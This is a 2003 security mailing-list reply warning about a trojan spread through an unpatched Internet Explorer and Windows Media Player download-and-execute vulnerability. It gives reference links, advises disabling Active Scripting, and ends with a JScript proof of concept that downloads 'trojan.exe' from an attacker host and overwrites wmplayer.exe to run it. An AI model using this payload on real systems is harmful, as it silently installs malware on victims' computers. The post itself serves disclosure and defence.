Date: 27 Oct 2003 17:47:19 -0000
From: K-OTiK Security <Special-Alerts@...tik.com>
To: bugtraq@...urityfocus.com
Subject: Re: a dangerous fast spreading (yet simple) trojan horse.

it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet Explorer File Download and Execution" :

http://www.k-otik.com/WMPLAYER-TEST/
http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

To prevent this exploit : Disable Active Scripting

Regards.
K-Otik Staff /// http://www.k-otik.com

----------------------- POC -------------------------
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://attacker/trojan.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";